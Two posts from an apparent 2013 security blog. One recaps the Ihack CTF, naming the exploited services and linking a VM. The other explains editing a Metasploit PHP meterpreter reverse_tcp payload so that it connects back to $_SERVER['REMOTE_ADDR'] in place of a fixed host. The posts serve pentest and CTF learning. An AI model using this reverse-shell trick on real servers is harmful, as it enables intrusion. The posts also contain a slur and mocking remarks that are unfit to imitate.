Thursday, April 18, 2013

Ihack 2013: Image and Writeups.. Download VM

Sorry for the delay. I`m not well for the past few days. 3 Days with sleepless night makes my decision capability affected quite badly. Nevertheless we manged to setup everything with few hiccups..
Congratulations to the winner. Now the bad parts.


1.Quality versus Quantity

Setting up 31 team's Network with VPN plus few custom network rules/patches is not an easy task. Writing a scoreserver is also not an easy task (A team from UTP even found a undefined  reference bug to bypass challenge score server). Neverless I did oops we did our best to ensure the game run smoothly with few hiccups along the way.

So it's quite a disappointment when participants asked some question such as :

1. Camane nak setup ip static?
2. Camane nak run VPN?
3. Ada Internet ke tak?
4. Ada laptop/pc lebih tak? Kami tak bawak PC/laptop.


Those of you who fall under that category should rot in the limbo's of /dev/null..

2. Alliance and Downfall of the web.

Scores was not submitted until 9:00 pm on-wards due to some improper configuration that I did that didn`t delegate appropriate privileged to retrieve the flags. The TBDIan guys starts owning the web and nightmares' begin around  9:00 pm onwards.

Startegy. Just like in real world we choose the correct friend. In the cruel CTF world, choosing the right allied may help you to secured your place in the competition.

3. One bug to rule em all.

There are 3 interesting daemon in the  image. Majority people reused the exploit from the web.. Which is a local travesal exploit via php streamwrapper. 
But I`m gonna summarized em up.

1. VSFTPD  backdorored exploit (Writeup from Sindrosa )
2. Faggot daemon  leaked address exploit . (Daisuke write a nice writeup)
3. And the Web yeah even the All Girl teams (does it sound sexist? who cares) managed to use this one... 

Kudos to the winner and here is the link to download to the VM.. There are no root accounts so u need to reset it to rw init=/bin/bash to create a a new account... 
Image expired in 5 days.


 Updated link

DOwnload with mega

Thursday, April 4, 2013

Leveraging Metasploit Meterpreter PHP the smart way.

As a metasploit dogs.. U alway try to integrate any vulnerabilities that you found during pentest with metasploit. One of my favourite metasploit payloads is PHP/meterpreter/reverse_tcp.

Now having said that, Metasploit is not really smart !!! (At least is not efficient in every scenario.)
For example suppose we generate the php/meterpreter/reverse_tcp payload.


Notice that u would always need to specified the LHOST.

This will caused an inconvenience in a sense that if u r in an environment where your IP address will always changes (for my sake let say i hate to register domains/or behind a shadowed network ).

Checking the payload output


You noticed that reverse remote IP Address is hardcoded in the payload..
What we can do is we can replace the $ip strings with remote addr global server  $_SERVER['REMOTE_ADDR']  .



Now we can upload it anywhere we want and we don`t have to setup our LHOST every again :). This trick can also be applied to jsp and asp files but i left that parts to you guys.